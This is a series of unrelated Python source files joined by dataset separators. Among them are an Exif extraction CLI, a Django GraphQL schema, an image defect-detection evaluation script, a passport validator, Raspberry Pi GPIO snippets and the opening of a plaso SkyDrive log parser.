with file.File(FLAGS.config_path, mode='w+') as f:
f.write(text_proto)
if __name__ == '__main__':
app.run(main)
| StarcoderdataPython |
90025 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
#
# Library to extract Exif information from digital camera image files.
# https://github.com/ianare/exif-py
#
#
# Copyright (c) 2002-2007 <NAME>
# Copyright (c) 2007-2014 <NAME> and contributors
# Copyright (c) 2020- Cyb3r Jak3
#
# See LICENSE.txt file for licensing information
# See ChangeLog.rst file for all contributors and changes
#
"""
Runs Exif tag extraction in command line.
"""
import sys
import argparse
import timeit
from exifreader.tags import DEFAULT_STOP_TAG, FIELD_TYPES
from exifreader import process_file, exif_log, __version__
logger = exif_log.get_logger()
def show_version():
"""Show the program version."""
print('Version %s on Python %s' % (__version__, sys.version[0:5]))
sys.exit(0)
def parse_arguments():
"""Parses command line arguments"""
parser = argparse.ArgumentParser(
description="Library to extract Exif information from digital camera image files.")
parser.add_argument('files', nargs='*', default=None,
help='Path of photos to check.')
parser.add_argument(
"-v", "--version", action="store_true", default=False,
help="Display version information and exit.")
parser.add_argument(
"-q", "--quick", action="store_false", dest="detailed", default=True,
help="Do not process MakerNotes")
parser.add_argument(
"-t", "--stop-tag", default=DEFAULT_STOP_TAG,
help="Stop processing when this tag is retrieved."
)
parser.add_argument(
"-s", "--strict", action="store_true", default=False,
help="Run in strict mode (stop on errors)."
)
parser.add_argument(
"-d", "--debug", action="store_true", default=False,
help="Run in debug mode"
)
return parser.parse_args()
def main():
"""Parse command line options/arguments and execute."""
args = parse_arguments()
if args.version:
show_version()
exif_log.setup_logger(args.debug)
# output info for each file
for filename in args.files:
file_start = timeit.default_timer()
try:
img_file = open(str(filename), 'rb')
except IOError:
logger.error("'%s' is unreadable", filename)
continue
logger.info("Opening: %s", filename)
tag_start = timeit.default_timer()
# get the tags
data = process_file(
img_file,
stop_tag=args.stop_tag,
details=args.detailed,
strict=args.strict,
debug=args.debug)
tag_stop = timeit.default_timer()
if not data:
logger.warning("No EXIF information found\n")
continue
if 'JPEGThumbnail' in data:
logger.info('File has JPEG thumbnail')
del data['JPEGThumbnail']
if 'TIFFThumbnail' in data:
logger.info('File has TIFF thumbnail')
del data['TIFFThumbnail']
tag_keys = list(data.keys())
tag_keys.sort()
for i in tag_keys:
logger.info('%s (%s): %s', i, FIELD_TYPES[data[i].field_type][2], data[i].printable)
file_stop = timeit.default_timer()
logger.debug("Tags processed in %s seconds", tag_stop - tag_start)
logger.debug("File processed in %s seconds", file_stop - file_start)
print("")
if __name__ == '__main__':
main()
| StarcoderdataPython |
122553 | <gh_stars>1-10
from queue import PriorityQueue as PQueue
N = int(input())
C = int(input())
V = int(input())
S = list(map(lambda x: int(x)-1, input().split()))
T = list(map(lambda x: int(x)-1, input().split()))
Y = list(map(int, input().split()))
M = list(map(int, input().split()))
E = [[] for _ in range(N)]
for f, t, cost, time in zip(S, T, Y, M):
E[t].append((f, cost, time))
INF = 10**7
dp = [[INF] * (C+1) for _ in range(N)]
for i in range(C+1):
dp[0][i] = 0
for t in range(N):
for j in range(C+1):
for f, cost, time in E[t]:
if j >= cost and dp[t][j] > dp[f][j-cost] + time:
dp[t][j] = dp[f][j-cost] + time
print(min(dp[N-1]) if min(dp[N-1]) != INF else -1)
| StarcoderdataPython |
1657839 | <gh_stars>10-100
#!/usr/bin/env python3
from __future__ import print_function
# dsl2.py
import sys
import importlib
def get_args(dsl_args):
"""return args, kwargs"""
args = []
kwargs = {}
for dsl_arg in dsl_args:
if '=' in dsl_arg:
k, v = dsl_arg.split('=', 1)
kwargs[k] = v
else:
args.append(dsl_arg)
return args, kwargs
# the source file is the 1st argument to the script
if len(sys.argv) != 2:
print('usage: %s <src.dsl>' % sys.argv[0])
sys.exit(1)
sys.path.insert(0, '/Users/nathan/code/dsl/modules')
with open(sys.argv[1], 'r') as file:
for line in file:
line = line.strip()
if not line or line[0] == '#':
continue
parts = line.split()
mod = importlib.import_module(parts[0])
args, kwargs = get_args(parts[2:])
getattr(mod, parts[1])(*args, **kwargs)
| StarcoderdataPython |
120359 | from django.contrib.auth import get_user_model
import graphene
from graphene import relay, ObjectType, AbstractType
from graphene_django import DjangoObjectType
from graphene_django.filter import DjangoFilterConnectionField
from graphene.types.datetime import DateTime
from conference.event.models import Conference, SponsorshipLevel, Sponsor, Room, Session
from conference.profiles.models import SocialHandle
class ConfNode(DjangoObjectType):
class Meta:
model = Conference
filter_fields = [
'slug',
]
interfaces = (relay.Node,)
class SponsorshipLevelNode(DjangoObjectType):
class Meta:
model = SponsorshipLevel
filter_fields = ['conference', 'id']
interfaces = (relay.Node,)
class SocialNode(DjangoObjectType):
class Meta:
model = SocialHandle
interfaces = (relay.Node,)
class UserNode(DjangoObjectType):
image = graphene.String(source='image')
class Meta:
model = get_user_model()
filter_fields = ['id']
interfaces = (relay.Node,)
class SponsorNode(DjangoObjectType):
logo_url = graphene.String(source='logo_url')
class Meta:
model = Sponsor
only_fields = ('name', 'url', 'description', 'level', 'active', 'logo',
'logo_url')
filter_fields = ['id', 'active']
interfaces = (relay.Node,)
class RoomNode(DjangoObjectType):
class Meta:
model = Room
filter_fields = ['conference', 'id']
interfaces = (relay.Node,)
class SessionNode(DjangoObjectType):
end = DateTime(source='end')
start_str = graphene.String(source='start_str')
end_str = graphene.String(source='end_str')
date_str = graphene.String(source='date_str')
class Meta:
model = Session
filter_fields = ['conference', 'id', 'status', 'stype', 'conference__slug']
interfaces = (relay.Node,)
class Query(AbstractType):
all_confs = DjangoFilterConnectionField(ConfNode)
all_levels = DjangoFilterConnectionField(SponsorshipLevelNode)
all_sponsors = DjangoFilterConnectionField(SponsorNode)
all_rooms = DjangoFilterConnectionField(RoomNode)
all_sessions = DjangoFilterConnectionField(SessionNode)
all_keynotes = DjangoFilterConnectionField(SessionNode)
| StarcoderdataPython |
3264880 | #利用加噪声的图像进行降噪自编码器的测试
import torch
import torchvision
from torch import nn
from torch.autograd import Variable
from torch.utils.data import DataLoader
from torchvision import transforms
from torchvision.utils import save_image
from torchvision.datasets import MNIST
import glob
import numpy as np
from PIL import Image
import matplotlib.pyplot as plt
import os
import cv2
import pySQI
import pyGTemplate
import testAAE
import time
import region
import scipy.io as scio
# import Imgprocessing
class AEGenerator(nn.Module):
def __init__(self):
super(AEGenerator, self).__init__()
self.encoder = nn.Sequential(
nn.Conv2d(1,32, 5, stride=2, padding=2),
nn.ReLU(True),# 64*128*128
nn.Conv2d(32,32, 5, stride=2, padding=2),
nn.ReLU(True),# 128*64*64
nn.Conv2d(32,64, 5, stride=2, padding=2),
nn.ReLU(True),# 256*32*32
nn.Conv2d(64,64, 5, stride=2, padding=2),
nn.ReLU(True),# 256*16*16
nn.Conv2d(64,128, 5, stride=2, padding=2),
nn.ReLU(True)# 512*8*8
)
self.fc1 = nn.Sequential(
nn.Linear(128*8*8, 128),
nn.ReLU(True)
)
self.fc2 = nn.Sequential(
nn.Linear(128, 128 * 8 * 8),
nn.ReLU(True)
)
self.decoder = nn.Sequential(
nn.ConvTranspose2d(128, 64, 4, stride=2, padding=1), # b, 16, 5, 5
nn.ReLU(True), # 256 * 16 * 16
nn.ConvTranspose2d(64, 64, 4, stride=2, padding=1), # b, 16, 5, 5
nn.ReLU(True), # 256 * 32 * 32
nn.ConvTranspose2d(64, 32, 4, stride=2, padding=1), # b, 16, 5, 5
nn.ReLU(True), # 128 * 64 * 64
nn.ConvTranspose2d(32, 32, 4, stride=2, padding=1), # b, 16, 5, 5
nn.ReLU(True), # 64 * 128 * 128
nn.ConvTranspose2d(32, 1, 4, stride=2, padding=1), # b, 16, 5, 5
nn.Sigmoid() # 1 * 256 * 256
)
def forward(self, x):
x = self.encoder(x)
x = x.view(x.size(0), -1)
x = self.fc1(x)
x = self.fc2(x)
x = x.view(x.size(0), 128, 8, 8)
x = self.decoder(x)
return x
def preprocessing(total_num, sample_id, threshold, exposure, write_flag):
sobel_mask_vect = []
src_vect = []
sobel_x =np.array([[-1, 0, 1],[-1, 0, 1],[-1, 0, 1]], dtype=np.float32)
sobel_y =np.array([[1, 1, 1],[0, 0, 0],[-1, -1, -1]], dtype=np.float32)
new_img = np.zeros((256,256), np.uint8)
for pic_num in range(1, total_num):
if write_flag:
src_file = '../data/sample_' + str(sample_id) + '/{:03d}'.format(exposure) + '/' + str(pic_num) + '.jpg'
output_file = '../data/sample_' + str(sample_id) + '/{:03d}'.format(exposure) + '/' + str(pic_num) + '.png'
IN_src_file = '../data/sample_' + str(sample_id) + '/{:03d}'.format(exposure) + '_IN/' + 'SQI' + '/' + '{:02d}'.format(pic_num) + '.png'
# output_file = '../data/sample_' + str(sample_id) + '/{:03d}'.format(exposure) + '_IN/' + 'TT' + '/' + '{:02d}'.format(pic_num) + '.png'
# region_file = './roi/region_' + str(pic_num) + '.png'
# print(src_file)
img = cv2.imread(src_file)
img = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
m,n = img.shape
img = img[0:n]
new_img[3:253,3:253] = img
cv2.imwrite(output_file, new_img)
new_img_copy = new_img.copy()
# IN_img = cv2.imread(IN_src_file)
# IN_img = cv2.cvtColor(IN_img, cv2.COLOR_BGR2GRAY)
# src_vect.append(IN_img)
else:
src_file = '../Dataset/defect_img/{:02}.png'.format(pic_num)
# src_file = '../data/sample_' + str(sample_id) + '/{:03d}'.format(exposure) + '/' + str(pic_num) + '.png'
# IN_src_file = '../data/sample_' + str(sample_id) + '/{:03d}'.format(exposure) + '_IN/' + 'SQI' + '/' + '{:02d}'.format(pic_num) + '.png'
new_img = cv2.imread(src_file)
new_img = cv2.cvtColor(new_img,cv2.COLOR_BGR2GRAY)
# IN_img = cv2.imread(IN_src_file)
# IN_img = cv2.cvtColor(IN_img, cv2.COLOR_BGR2GRAY)
# src_vect.append(IN_img)
sobel_mag = np.zeros(new_img.shape, np.float)
# sobel_angle = np.zeros(new_img.shape, np.float)
# quantized_angle = np.zeros(new_img.shape, np.uint8)
sobel_mask = np.zeros(new_img.shape, np.uint8)
# img_Guassian = cv2.GaussianBlur(new_img,(5,5),0)
# img_Guassian.astype(np.uint8)
# m,n = img_Guassian.shape
# m,n = new_img.shape
# for i in range(2,m-1):
# for j in range(2,n-1):
# Gx = np.sum(new_img[i-1:i+2, j-1:j+2] * sobel_x)
# Gy = np.sum(new_img[i-1:i+2, j-1:j+2] * sobel_y)
# sobel_mag[i,j] = math.sqrt(math.pow(Gx,2) + math.pow(Gy,2))
# sobel_angle[i,j] = math.atan2(Gy, Gx) * 180 / math.pi
# # quantized_angle[i,j] = quantizeAngle(sobel_angle[i,j])
# if sobel_mag[i,j] >= threshold:
# sobel_mask[i,j] = 1
# contour = angleFilter(sobel_mask, quantized_angle)
# contour = cv2.blur(contour, (3,3))
# sobelx = cv2.Sobel(new_img,cv2.CV_32F,1,0) #默认ksize=3
# sobely = cv2.Sobel(new_img,cv2.CV_32F,0,1)
sobelx = cv2.filter2D(new_img, cv2.CV_32F, sobel_x)
sobely = cv2.filter2D(new_img, cv2.CV_32F, sobel_y)
sobel_mag = np.sqrt(pow(sobelx,2) + pow(sobely,2))
# sobel_angle = np.arctan2(sobely,sobelx) * 180 /math.pi
sobel_mag = cv2.convertScaleAbs(sobel_mag)
_, sobel_mask = cv2.threshold(sobel_mag, threshold, 255, 0)
# contour = angleFilter(sobel_mask, sobel_angle)
# contour = cv2.blur(contour, (3,3))
# sobel_mask = cv2.blur(sobel_mask, (3,3))
# contour_vect.append(contour)
# cv2.imshow('sobel', sobel_mask)
# cv2.waitKey(0)
sobel_mask_vect.append(sobel_mask)
return sobel_mask_vect
def Contour_extraction(img_files, model):
width = 256
height = 256
x_truth = np.reshape(img_files, (len(img_files), width, height, 1)) # adapt this if using `channels_first` image data format
#先增加一个维度
# user_emb_dims = np.expand_dims(self.user_emb, axis=0)
# user_emb_dims.shape
x_test = x_truth
x_truth = np.array(x_truth)
x_truth = x_truth.astype('float32') / 255.
x_test = np.array(x_test)
x_test = x_test.astype('float32') / 255.
x_truth = np.reshape(x_truth, (len(x_truth),1, width, height)) # adapt this if using `channels_first` image data format
x_test = np.reshape(x_test, (len(x_test),1, width, height)) # adapt this if using `channels_first` image data format
batch_test=torch.Tensor(x_test)
img = Variable(batch_test).cuda()
# ===================forward=====================
output = model(img)
output_imgs = output.cpu().data.numpy()
noise_imgs = img.cpu().data.numpy()
output_imgs = output_imgs * 255
output_imgs = output_imgs.transpose(0,2,3,1)
noise_imgs = noise_imgs * 255
noise_imgs = noise_imgs.transpose(0,2,3,1)
contours = []
for i,singleimg in enumerate(output_imgs):
_,singleimg = cv2.threshold(singleimg, 170, 255, 0)
contours.append(singleimg)
return contours
def Template_method():
total_num = 28
foldernum = 11
# sample_id = 0
threshold = 160
# exposure = 6
# write_flag = False
evaluate_flag = False
extract_CF = False
# W = 30
# H = 20
Wh = 0.3
Wl = 0.5
Wh_vect = np.array([Wh])
Wl_vect = np.array([Wl])
if(evaluate_flag):
Wh_vect = np.linspace(0.1,0.9, 85, endpoint= True)
Wl_vect = np.linspace(0.1,0.9, 85, endpoint= True)
# print(Wh_vect)
ParaName = 'parameter.npy'
# ---------------- Load model ----------------------
model_id = 802
model_is_trained_parallel = True
if not os.path.exists('../Test_Image'):
os.mkdir('../Test_Image')
if not os.path.exists('../Test_Image/input'):
os.mkdir('../Test_Image/input')
if not os.path.exists('../Test_Image/output'):
os.mkdir('../Test_Image/output')
# if not os.path.exists('../Detection_results'):
# os.mkdir('../Detection_results')
# Setting Image Propertie
model = AEGenerator().cuda()
if model_is_trained_parallel: #如果使用服务器并行训练的模型需要加上以下的步骤
device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu")
model = nn.DataParallel(model,device_ids=[0])
model.to(device)
# model.load_state_dict(torch.load('./model/aug/conv_aae_epoch_2990.pth'))
checkpoint = torch.load('../Model/GAN/aegan_epoch_{}.pth'.format(model_id))
# here, checkpoint is a dict with the keys you defined before
model.load_state_dict(checkpoint['model'])
F1_evaluate = []
Precise_evaluate = []
Recall_evaluate = []
index = 0
total_time = []
sqi_time = []
ROI_time = []
detection_time = []
initial_template = pyGTemplate.inittempGeneration(ParaName, [256,256])
for Wl_idx, Wl in enumerate(Wl_vect):
# st = time.time()
IN_img_vect = []
GT_img_vect = []
sobel_mask_vect = []
sobel_x =np.array([[-1, 0, 1],[-1, 0, 1],[-1, 0, 1]], dtype=np.float32)
sobel_y =np.array([[1, 1, 1],[0, 0, 0],[-1, -1, -1]], dtype=np.float32)
# new_img = np.zeros((256,256), np.uint8)
Precise = []
Recall = []
F1 = []
for folder_num in range(1, foldernum+1):
Precise_mean = []
Recall_mean = []
F1_mean = []
for pic_num in range(1, total_num):
# src_file = '../data/sample_' + str(sample_id) + '/{:03d}'.format(exposure) + '/' + str(pic_num) + '.png'
if extract_CF:
src_file = '../Dataset/origin_img/{:02}.png'.format(pic_num)
else:
src_file = '../Dataset/defect_img/{:02}/{:02}.png'.format(folder_num, pic_num)
index += 1
gt_file = '../Dataset/Mask_img/{:02}/{:02}.png'.format(folder_num, pic_num)
img_in = cv2.imread(src_file)
img_in = cv2.cvtColor(img_in, cv2.COLOR_BGR2GRAY)
img_gt = cv2.imread(gt_file)
img_gt = cv2.cvtColor(img_gt, cv2.COLOR_BGR2GRAY)
sqi_start = time.time()
imgout = pySQI.SQI(img_in)
sqi_end = time.time()
sqi_time.append(sqi_end - sqi_start)
# IN_img_vect.append(imgout)
# GT_img_vect.append(img_gt)
sobel_mag = np.zeros(img_in.shape, np.float)
sobel_mask = np.zeros(img_in.shape, np.uint8)
sobelx = cv2.filter2D(img_in, cv2.CV_32F, sobel_x)
sobely = cv2.filter2D(img_in, cv2.CV_32F, sobel_y)
sobel_mag = np.sqrt(pow(sobelx,2) + pow(sobely,2))
sobel_mag = cv2.convertScaleAbs(sobel_mag)
_, sobel_mask = cv2.threshold(sobel_mag, threshold, 255, 0)
sobel_mask_vect.append(sobel_mask)
contour = Contour_extraction([sobel_mask], model)
single_img = contour[0].astype(np.uint8)
mask = region.regionGenerate(single_img)
kernel = cv2.getStructuringElement(cv2.MORPH_ELLIPSE,(3, 3))
eroded = cv2.erode(mask,kernel)
eroded_2 = cv2.erode(eroded,kernel)
eroded_3 = cv2.erode(eroded_2,kernel)
roi = cv2.bitwise_and(imgout, imgout, mask=eroded)
sub = eroded - eroded_3
roi[(sub>0)*(roi<80)] = 0
eroded[(sub>0)] = 0
if extract_CF:
region_file = '../roi/region_{:02d}'.format(pic_num) + '.png'
mask_file = '../Template/bin_mask/region_{:02d}'.format(pic_num) + '.png'
cv2.imwrite(region_file, roi)
cv2.imwrite(mask_file, eroded)
detect_start = time.time()
ROI_time.append(detect_start - sqi_end)
defect_mask, defect_rgb = pyGTemplate.TempGenAndDetection(ParaName, Wh, Wl, initial_template, imgout, roi, eroded)
detect_end = time.time()
detection_time.append(detect_end - detect_start)
total_time.append(detect_end - sqi_start)
# print('Detection cost:{:.4f}'.format(end - start))
# result_file = '../Results/defect_rgb_{:02d}'.format(pic_num) + '.png'
mask_file = '../Results/mask/{:03d}.png'.format(index)
result_file = '../Results/rgb/{:03d}.png'.format(index)
if not (extract_CF and evaluate_flag):
cv2.imwrite(mask_file, defect_mask)
cv2.imwrite(result_file, defect_rgb)
# cv2.imwrite(result_file, defect_rgb)
# cv2.imwrite(mask_file, defect_mask)
# kernel = cv2.getStructuringElement(cv2.MORPH_ELLIPSE,(3, 3))
# defect_mask = cv2.dilate(defect_mask, kernel)
# result = np.zeros(defect_mask.shape, np.uint8)
# result[(defect_mask_>0)*(sobel_mask>0)+(defect_mask>0)] = 255
# kernel = cv2.getStructuringElement(cv2.MORPH_ELLIPSE,(5, 5))
# result = cv2.dilate(result, kernel)
# kernel = cv2.getStructuringElement(cv2.MORPH_ELLIPSE,(7, 7))
# result = cv2.erode(result, kernel)
one = np.ones(defect_mask.shape, np.uint8)
Inter = one[(defect_mask>0)*(img_gt>0)]
Union = one[(defect_mask>0)+(img_gt>0)]
IoU = np.sum(Inter)/np.sum(Union)
if np.sum(Inter) == 0 and np.sum(Union) == 0 :
IoU = 1
TP = np.sum(one[(defect_mask>0)*(img_gt>0)])
FP = np.sum(one[(defect_mask>0)*(img_gt==0)])
FN = np.sum(one[(defect_mask==0)*(img_gt>0)])
precise = TP/(TP+FP)
recall = TP/(TP+FN)
if (TP+FP)==0:
precise = 0
if (TP+FN)==0:
recall = 0
if recall==0 and precise==0:
F1 = 0
else:
F1 = 2*(precise*recall)/(precise + recall)
print('IoU : {:.4f} Precise : {:.4f} Recall : {:.4f} F1 : {:.4f}'.format(IoU, precise, recall, F1))
# if precise:
Precise_mean.append(precise)
# if recall:
Recall_mean.append(recall)
# if F1:
F1_mean.append(F1)
# cv2.imshow('mask', defect_mask)
# cv2.imshow('defect', defect_rgb)
# cv2.waitKey(0)
# ed = time.time()
# print("IN_Cost:{:.5f}".format(ed-st))
# time_start = time.time()
# sobel_mask_vect = preprocessing(total_num, sample_id, threshold, exposure, write_flag)
# time_end = time.time()
# print('Proprecessing time cost:{:.3f}'.format(time_end - time_start))
# contour_vect = Contour_extraction(sobel_mask_vect)
# print('AAE time cost:{:.3f}'.format(time.time() - time_end))
# for i, singleimg in enumerate(contour_vect):
# # singleimg = np.squeeze(singleimg, axis=(2,))
# singleimg = singleimg.astype(np.uint8)
# src = IN_img_vect[i]
# # cv2.imshow('src',src)
# # cv2.waitKey(0)
# region_file = '../roi/region_{:02d}'.format(i) + '.png'
# mask_file = '../Template/bin_mask/region_{:02d}'.format(i) + '.png'
# mask = region.regionGenerate(singleimg)
# kernel = cv2.getStructuringElement(cv2.MORPH_ELLIPSE,(3, 3))
# eroded = cv2.erode(mask,kernel)
# eroded_2 = cv2.erode(eroded,kernel)
# eroded_3 = cv2.erode(eroded_2,kernel)
# roi = cv2.bitwise_and(src, src, mask=eroded)
# sub = eroded - eroded_3
# roi[(sub>0)*(roi<80)] = 0
# eroded[(sub>0)*(roi<80)] = 0
# # background = cv2.bitwise_not(eroded)
# # cv2.imwrite(region_file, roi)
# # cv2.imwrite(mask_file, eroded)
# # cv2.imshow('region', roi+background)
# # cv2.waitKey(0)
# #--------------------defect detection
# # cv2.imshow('roi', roi)
# # cv2.imshow('eroded', eroded)
# # cv2.waitKey(0)
# start = time.time()
# defect_mask, defect_rgb = pyGTemplate.TempGenAndDetection(ParaName, Wh, Wl, roi, eroded)
# end = time.time()
# print('Detection cost:{:.4f}'.format(end - start))
# result_file = '../Results/defect_rgb_{:02d}'.format(i) + '.png'
# mask_file = '../Results/defect_mask_{:02d}'.format(i) + '.png'
# # cv2.imwrite(result_file, defect_rgb)
# # cv2.imwrite(mask_file, defect_mask)
# cv2.imshow('mask', defect_mask)
# cv2.waitKey(0)
# print('Totally time cost:{:.3f}'.format(time.time() - st))
Precise_mean = np.mean(Precise_mean)
Recall_mean = np.mean(Recall_mean)
F1_mean = np.mean(F1_mean)
print('Mean Precise : {:.4f} Mean Recall : {:.4f} Mean F1 : {:.4f}'.format(Precise_mean, Recall_mean, F1_mean))
Precise_evaluate.append(Precise_mean)
Recall_evaluate.append(Recall_mean)
F1_evaluate.append(F1_mean)
Precise = np.max(Precise_mean)
Recall = np.max(Recall_mean)
F1 = np.max(F1_mean)
Precise_evaluate = np.array(Precise)
Recall_evaluate = np.array(Recall)
F1_evaluate = np.array(F1)
data = np.vstack((Precise_evaluate, Recall_evaluate, F1_evaluate))
mean_data = np.mean(data,1)
sqi_mean = np.mean(sqi_time)
ROI_mean = np.mean(ROI_time)
detection_mean = np.mean(detection_time)
total_mean = np.mean(total_time)
if(evaluate_flag):
mat = 'Wl_evaluate_data.mat'
scio.savemat(mat, {'data': data})
else:
with open('result.txt', 'w') as f:
f.write('Mean Precise : {:.4f} Mean Recall : {:.4f} Mean F1 : {:.4f} \n'.format(mean_data[0], mean_data[1], mean_data[2]))
f.write('Avg SQI time_cost: {:.4f} Avg RoI_extract time_cost: {:.4f} Avg detection time_cost: {:.4f} \n'.format(sqi_mean, ROI_mean, detection_mean))
f.write('Total time cost: {:.4f}'.format(total_mean))
if __name__ == "__main__":
Template_method()
| StarcoderdataPython |
7107 | import enum
class Status(enum.Enum):
"""Status enumeration."""
ACTIVE = 'ACTIVE'
DISABLED = 'DISABLED'
ARCHIVED = 'ARCHIVED'
DELETED = 'DELETED'
class ProgressStatus(enum.Enum):
"""Enumeration indicates the different
stages of the progress made on an engagement,
job or task."""
NOT_STARTED = 'NOT STARTED'
RUNNING = 'RUNNING'
IN_REVIEW = 'IN REVIEW'
REVIEWED = 'REVIEWED'
CLOSED = 'CLOSED'
| StarcoderdataPython |
1742807 | passports = []
def parseFields(passport):
parsedPassport = {}
fields = passport[:-1].split(" ")
for field in fields:
pair = field.split(":", 1)
parsedPassport[pair[0]] = pair[1]
return parsedPassport
def validatePassportFields(passport):
return bool(validatePassportFieldBirthYear(passport["byr"])
and validatePassportFieldIssueYear(passport["iyr"])
and validatePassportFieldExpirationYear(passport["eyr"])
and validatePassportFieldHight(passport["hgt"])
and validatePassportFieldHairColour(passport["hcl"])
and validatePassportFieldEyeColour(passport["ecl"])
and validatePassportFieldPassportId(passport["pid"]))
def validatePassportFieldBirthYear(birthYear):
birthYear = int(birthYear)
if birthYear < 1920 or birthYear > 2002:
print("Invalid birth year: {}".format(passport["byr"]))
return False
return True
def validatePassportFieldIssueYear(issueYear):
issueYear = int(issueYear)
if issueYear < 2010 or issueYear > 2020:
print("Invalid issue year: {}".format(passport["iyr"]))
return False
return True
def validatePassportFieldExpirationYear(expirationYear):
expirationYear = int(expirationYear)
if expirationYear < 2020 or expirationYear > 2030:
print("Invalid expiration year: {}".format(passport["eyr"]))
return False
return True
def validatePassportFieldHight(hight):
if len(hight) < 4:
print("Invalid height: {}".format(hight))
return False
hightUnit = hight[-2:]
hightQuantity = int(hight[:-2])
if hightUnit == "cm":
if hightQuantity < 150 or hightQuantity > 193:
print("Invalid height: {}".format(hight))
return False
elif hightUnit == "in":
if hightQuantity < 59 or hightQuantity > 76:
print("Invalid height: {}".format(hight))
return False
else:
return False
return True
def validatePassportFieldHairColour(hairColour):
if len(hairColour) != 7:
print("Invalid hair colour: {}".format(hairColour))
return False
if hairColour[0] != "#":
print("Invalid hair colour: {}".format(hairColour))
return False
for character in hairColour[1:]:
if character not in ("0123456789abcdef"):
print("Invalid hair colour: {}".format(hairColour))
return False
return True
def validatePassportFieldEyeColour(eyeColour):
if eyeColour not in ("amb", "blu", "brn", "gry", "grn", "hzl", "oth"):
print("Invalid eye colour: {}".format(eyeColour))
return False
return True
def validatePassportFieldPassportId(passportId):
try:
int(passportId)
except ValueError:
return False
if len(passportId) > 9:
print("Invalid passport ID: {}".format(passportId))
return False
return True
with open("input.txt") as f:
passport = ""
line = f.readline()
while True:
if line == "\n":
passports.append(parseFields(passport))
passport = ""
else:
passport += line.replace("\n", " ")
line = f.readline()
if not line:
passports.append(parseFields(passport))
break
requiredFields = ("byr", "ecl", "eyr", "hcl", "hgt", "iyr", "pid")
validPassports = 0
for passport in passports:
invalidPassport = False
for field in requiredFields:
if field not in passport:
invalidPassport = True
break
if invalidPassport:
continue
if validatePassportFields(passport):
validPassports += 1
print(validPassports)
| StarcoderdataPython |
1733170 | <reponame>hyjiacan/restful-dj
from types import MethodType
class RouteMeta:
"""
路由元数据
"""
def __init__(self,
handler: MethodType,
func_args,
route_id=None,
module=None,
name=None,
kwargs=None):
"""
:param handler: 路由处理函数对象
:param func_args: 路由处理函数参数列表
:param route_id: 路由ID,此ID由路由相关信息组合而成
:param module: 装饰器上指定的 module 值
:param name: 装饰器上指定的 name 值
:param kwargs: 装饰器上指定的其它参数
"""
self._handler = handler
self._func_args = func_args
self._id = route_id
self._module = module
self._name = name
self._kwargs = {} if kwargs is None else kwargs
@property
def handler(self) -> MethodType:
"""
路由处理函数对象
:return:
"""
return self._handler
@property
def func_args(self):
"""
路由处理函数参数列表
:return:
:rtype: OrderedDict
"""
return self._func_args
@property
def id(self) -> str:
"""
路由ID,此ID由路由相关信息组合而成
:return:
"""
return self._id
@property
def module(self) -> str:
"""
装饰器上指定的 module 值
:return:
"""
return self._module
@property
def name(self) -> str:
"""
装饰器上指定的 name 值
:return:
"""
return self._name
@property
def kwargs(self) -> dict:
"""
装饰器上指定的其它参数
:return:
:rtype: Dict
"""
return self._kwargs
def has(self, arg_name):
"""
指定的参数是否存在
:param arg_name:
:return:
"""
return arg_name in self._kwargs
def get(self, arg_name: str, default_value=None):
"""
获取指定参数的值
:param default_value:
:param arg_name:
:return:
"""
return self._kwargs[arg_name] if arg_name in self._kwargs else default_value
| StarcoderdataPython |
113609 | <filename>examples/blink.py
import time
import Rpi.GPIO as GPIO
from piwho import recognition
def blink(pin):
GPIO.output(pin,GPIO.HIGH)
time.sleep(1)
GPIO.output(pin,GPIO.LOW)
time.sleep(1)
def identify():
recog = recognition.SpeakerRecognizer('./recordings/')
friends = ['Abhishek', 'Ankit', 'Abhinav']
name = recog.identify_speaker()
if name[0] in names:
for i in range(10):
blink(11)
elif name[1] in friends:
for in range(10):
blink(12)
if __name__ == "__main__":
GPIO.setmode(GPIO.BOARD)
GPIO.setup(11,GPIO.OUT)
identify()
GPIO.cleanup()
| StarcoderdataPython |
159109 | <filename>test.py
import ADS7830
ads = ADS7830.ADS7830(1, 0x48)
for i in range(0,8):
print "{0}: {1}".format(i, ads.Read(i))
| StarcoderdataPython |
1609704 | <gh_stars>0
# -*- coding: utf-8 -*-
"""This file contains SkyDrive log file parser in plaso."""
from __future__ import unicode_literals
import pyparsing
from dfdatetime import time_elements as dfdatetime_time_elements
from plaso.containers import events
from plaso.containers import time_events
from plaso.lib import errors
from plaso.lib import definitions
from plaso.parsers import logger
from plaso.parsers import manager
from plaso.parsers import text_parser
class SkyDriveLogEventData(events.EventData):
"""SkyDrive log event data.
Attributes:
detail (str): details.
log_level (str): log level.
module (str): name of the module that generated the log message.
source_code (str): source file and line number that generated the log
message.
"""
DATA_TYPE = 'skydrive:log:line'
def __init__(self):
"""Initializes event data."""
super(SkyDriveLogEventData, self).__init__(data_type=self.DATA_TYPE)
self.detail = None
self.log_level = None
self.module = None
self.source_code = None
class SkyDriveOldLogEventData(events.EventData):
"""SkyDrive old log event data.
Attributes:
log_level (str): log level.
source_code (str): source file and line number that generated the log
message.
text (str): log message.
"""
DATA_TYPE = 'skydrive:log:old:line'
def __init__(self):
"""Initializes event data."""
super(SkyDriveOldLogEventData, self).__init__(data_type=self.DATA_TYPE)
self.log_level = None
self.source_code = None
self.text = None
class SkyDriveLogParser(text_parser.PyparsingMultiLineTextParser):
"""Parses SkyDrive log files."""
NAME = 'skydrive_log'
DESCRIPTION = 'Parser for OneDrive (or SkyDrive) log files.'
_ENCODING = 'utf-8'
# Common SDF (SkyDrive Format) structures.
_COMMA = pyparsing.Literal(',').suppress()
_HYPHEN = text_parser.PyparsingConstants.HYPHEN
_THREE_DIGITS = text_parser.PyparsingConstants.THREE_DIGITS
_TWO_DIGITS = text_parser.PyparsingConstants.TWO_DIGITS
MSEC = pyparsing.Word(pyparsing.nums, max=3).setParseAction(
text_parser.PyParseIntCast)
IGNORE_FIELD = pyparsing.CharsNotIn(',').suppress()
# Date and time format used in the header is: YYYY-MM-DD-hhmmss.###
# For example: 2013-07-25-160323.291
_SDF_HEADER_DATE_TIME = pyparsing.Group(
text_parser.PyparsingConstants.DATE_ELEMENTS + _HYPHEN +
_TWO_DIGITS.setResultsName('hours') +
_TWO_DIGITS.setResultsName('minutes') +
_TWO_DIGITS.setResultsName('seconds') +
pyparsing.Literal('.').suppress() +
_THREE_DIGITS.setResultsName('milliseconds')).setResultsName(
'header_date_time')
# Date and time format used in lines other than the header is:
# MM-DD-YY,hh:mm:ss.###
